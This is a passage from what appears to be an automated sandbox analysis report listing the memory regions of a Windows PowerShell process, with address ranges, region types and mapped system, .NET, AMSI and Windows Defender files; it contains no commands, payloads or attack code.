0x7ffb24143fff monitored = 0 entry_point = 0x7ffb24123260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 11601 start_va = 0x1aa90000 end_va = 0x1ae8afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001aa90000" filename = "" Region: id = 11625 start_va = 0x1ea0000 end_va = 0x1ea3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "certificate.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml") Region: id = 11645 start_va = 0x1a440000 end_va = 0x1a467fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 11807 start_va = 0x1a440000 end_va = 0x1a461fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dotnettypes.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml") Region: id = 11818 start_va = 0x1a440000 end_va = 0x1a461fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dotnettypes.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml") Region: id = 11819 start_va = 0x1a440000 end_va = 0x1a467fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 11884 start_va = 0x1ea0000 end_va = 0x1ea6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "filesystem.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml") Region: id = 11885 start_va = 0x1ea0000 end_va = 0x1ea6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "filesystem.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml") Region: id = 11886 start_va = 0x1a440000 end_va = 0x1a467fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 11926 start_va = 0x1ae90000 end_va = 0x1aed4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "help.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml") Region: id = 11927 start_va = 0x1ae90000 end_va = 0x1aed4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "help.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml") Region: id = 11928 start_va = 0x1a440000 end_va = 0x1a467fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 12010 start_va = 0x1a440000 end_va = 0x1a473fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "helpv3.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\HelpV3.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\helpv3.format.ps1xml") Region: id = 12011 start_va = 0x1a440000 end_va = 0x1a467fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 12052 start_va = 0x1a440000 end_va = 0x1a472fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershellcore.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml") Region: id = 12053 start_va = 0x1a440000 end_va = 0x1a472fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershellcore.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml") Region: id = 12073 start_va = 0x1a440000 end_va = 0x1a467fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 12118 start_va = 0x1ea0000 end_va = 0x1ea1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershelltrace.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml") Region: id = 12119 start_va = 0x1a440000 end_va = 0x1a467fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 12137 start_va = 0x1ea0000 end_va = 0x1ea2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "registry.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml") Region: id = 12138 start_va = 0x1ea0000 end_va = 0x1ea2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "registry.format.ps1xml" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml") Region: id = 12139 start_va = 0x1a440000 end_va = 0x1a467fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 12197 start_va = 0x1ea0000 end_va = 0x1eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 12221 start_va = 0x1f40000 end_va = 0x1f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f40000" filename = "" Region: id = 12296 start_va = 0x1ae90000 end_va = 0x1b81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001ae90000" filename = "" Region: id = 12297 start_va = 0x7ffb23aa0000 end_va = 0x7ffb23b35fff monitored = 0 entry_point = 0x7ffb23ac5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 12302 start_va = 0x1b820000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b820000" filename = "" Region: id = 12371 start_va = 0x1b8b0000 end_va = 0x1b98cfff monitored = 0 entry_point = 0x1b90e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 12429 start_va = 0x1b820000 end_va = 0x1b89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b820000" filename = "" Region: id = 12430 start_va = 0x1b8a0000 end_va = 0x1b8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8a0000" filename = "" Region: id = 12431 start_va = 0x1b8b0000 end_va = 0x1b92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b8b0000" filename = "" Region: id = 12432 start_va = 0x1b930000 end_va = 0x1b9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b930000" filename = "" Region: id = 12550 start_va = 0x7ffb1cb80000 end_va = 0x7ffb1cb8ffff monitored = 0 entry_point = 0x7ffb1cb851b0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\System32\\amsi.dll" (normalized: "c:\\windows\\system32\\amsi.dll") Region: id = 12567 start_va = 0x1ea0000 end_va = 0x1ea0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 12568 start_va = 0x7ffb266b0000 end_va = 0x7ffb26756fff monitored = 0 entry_point = 0x7ffb266bb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 12569 start_va = 0x1f40000 end_va = 0x1f40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f40000" filename = "" Region: id = 12570 start_va = 0x7ffb1cb60000 end_va = 0x7ffb1cb7cfff monitored = 0 entry_point = 0x7ffb1cb6e930 region_type = mapped_file name = "mpoav.dll" filename = "\\Program Files\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files\\windows defender\\mpoav.dll") Region: id = 12571 start_va = 0x7ffb0de70000 end_va = 0x7ffb0df4efff monitored = 0 entry_point = 0x7ffb0dea4ef0 region_type = mapped_file name = "mpclient.dll" filename = "\\Program Files\\Windows Defender\\MpClient.dll" (normalized: "c:\\program files\\windows defender\\mpclient.dll") Region: id = 12572 start_va = 0x1a440000 end_va = 0x1a441fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msmplics.dll" filename = "\\Program Files\\Windows Defender\\MsMpLics.dll" (normalized: "c:\\program files\\windows defender\\msmplics.dll") Region: id = 12573 start_va = 0x1b9b0000 end_va = 0x1baaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001b9b0000" filename = "" Region: id = 12574 start_va = 0x7ffb24880000 end_va = 0x7ffb2489efff monitored = 0 entry_point = 0x7ffb24885d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 12579 start_va = 0x1a440000 end_va = 0x1a46dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000001a440000" filename = "" Region: id = 12580 start_va = 0x1bab0000 end_va = 0x1bb2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bab0000" filename = "" Region: id = 12581 start_va = 0x1bb30000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb30000" filename = "" Region: id = 12586 start_va = 0x7ffaa9f60000 end_va = 0x7ffaa9f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f60000" filename = "" Region: id = 12587 start_va = 0x7ffaa9f70000 end_va = 0x7ffaa9f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f70000" filename = "" Region: id = 12591 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12621 start_va = 0x7ffb03d90000 end_va = 0x7ffb040c0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.runtime.serialization.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Runteb92aa12#\\340cf313b8da7e43376ee98292cc61e7\\System.Runtime.Serialization.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.runteb92aa12#\\340cf313b8da7e43376ee98292cc61e7\\system.runtime.serialization.ni.dll") Region: id = 12622 start_va = 0x7ffb1c950000 end_va = 0x7ffb1c974fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "smdiagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\SMDiagnostics\\3aa7da61075c3a19976503e08685ea9c\\SMDiagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\smdiagnostics\\3aa7da61075c3a19976503e08685ea9c\\smdiagnostics.ni.dll") Region: id = 12625 start_va = 0x7ffb0ac50000 end_va = 0x7ffb0ad41fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.servicemodel.internals.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Servd1dec626#\\d9557b4b0aa51aa795c37cc322226be5\\System.ServiceModel.Internals.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.servd1dec626#\\d9557b4b0aa51aa795c37cc322226be5\\system.servicemodel.internals.ni.dll") Region: id = 12636 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12637 start_va = 0x1bb30000 end_va = 0x1bb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb30000" filename = "" Region: id = 12638 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 12639 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 12640 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 12645 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12646 start_va = 0x1bb30000 end_va = 0x1bb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb30000" filename = "" Region: id = 12647 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 12648 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 12649 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 12651 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12655 start_va = 0x1bb30000 end_va = 0x1bb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb30000" filename = "" Region: id = 12656 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 12657 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 12658 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12659 start_va = 0x1bb30000 end_va = 0x1bb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb30000" filename = "" Region: id = 12660 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 12661 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 12662 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 12667 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12668 start_va = 0x1bb30000 end_va = 0x1bb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb30000" filename = "" Region: id = 12669 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 12670 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 12671 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 12673 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12674 start_va = 0x1bb30000 end_va = 0x1bb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb30000" filename = "" Region: id = 12677 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 12678 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 12679 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 12680 start_va = 0x1bb70000 end_va = 0x1bb7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb70000" filename = "" Region: id = 12682 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12683 start_va = 0x1bb30000 end_va = 0x1bb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb30000" filename = "" Region: id = 12684 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 12685 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 12686 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 12687 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12688 start_va = 0x1bb30000 end_va = 0x1bb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb30000" filename = "" Region: id = 12689 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 12694 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 12695 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12696 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12697 start_va = 0x1bb30000 end_va = 0x1bb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb30000" filename = "" Region: id = 12698 start_va = 0x1bb40000 end_va = 0x1bb4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb40000" filename = "" Region: id = 12699 start_va = 0x1bb50000 end_va = 0x1bb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb50000" filename = "" Region: id = 12700 start_va = 0x1bb60000 end_va = 0x1bb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb60000" filename = "" Region: id = 12701 start_va = 0x1bb70000 end_va = 0x1bb7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb70000" filename = "" Region: id = 12702 start_va = 0x1bb80000 end_va = 0x1bb8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb80000" filename = "" Region: id = 12703 start_va = 0x1bb90000 end_va = 0x1bb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb90000" filename = "" Region: id = 12716 start_va = 0x7ffb03480000 end_va = 0x7ffb03d89fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.data.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Data\\9be0116d0c465b75b11a42413573047c\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system.data\\9be0116d0c465b75b11a42413573047c\\system.data.ni.dll") Region: id = 12717 start_va = 0x7ffb03130000 end_va = 0x7ffb0347cfff monitored = 1 entry_point = 0x7ffb0327158e region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 12718 start_va = 0x7ffb28450000 end_va = 0x7ffb284bafff monitored = 0 entry_point = 0x7ffb284690c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 12719 start_va = 0x1bb30000 end_va = 0x1be73fff monitored = 1 entry_point = 0x1bc7158e region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_64\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_64\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 12724 start_va = 0x7ffaa9f80000 end_va = 0x7ffaa9f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffaa9f80000" filename = "" Region: id = 12725 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12726 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12727 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12729 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12730 start_va = 0x1bb30000 end_va = 0x1bb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb30000" filename = "" Region: id = 12731 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12735 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12736 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12737 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12738 start_va = 0x1bb30000 end_va = 0x1bb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb30000" filename = "" Region: id = 12739 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12740 start_va = 0x1bb30000 end_va = 0x1bb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb30000" filename = "" Region: id = 12745 start_va = 0x1a470000 end_va = 0x1a470fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psd1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1") Region: id = 12746 start_va = 0x1bb70000 end_va = 0x1bbaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bb70000" filename = "" Region: id = 12747 start_va = 0x1bbb0000 end_va = 0x1bc2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001bbb0000" filename = "" Region: id = 12748 start_va = 0x1bb30000 end_va = 0x1bb57fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" filename = "\\Windows\\System32\\CatRoot\\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\\Microsoft-Windows-Client-Features-WOW64-Package-AutoMerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat" (normalized: "c:\\windows\\system32\\catroot\\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\\microsoft-windows-client-features-wow64-package-automerged-admin~31bf3856ad364e35~amd64~~10.0.10586.0.cat") Region: id = 12749 start_va = 0x1a470000 end_va = 0x1a47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000001a470000" filename = "" Region: id = 12754 start_va = 0x7ffb02440000 end_va = 0x7ffb03125fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.commands.utility.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\88a975931d03d5c3848280ed0b4cee0d\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\microsoft.p521220ea#\\88a975931d03d5c3848280ed0b4cee0d\\microsoft.powershell.commands.utility.ni.dll") Region: id = 12763 start_va = 0x1a470000 end_va = 0x1a475fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: 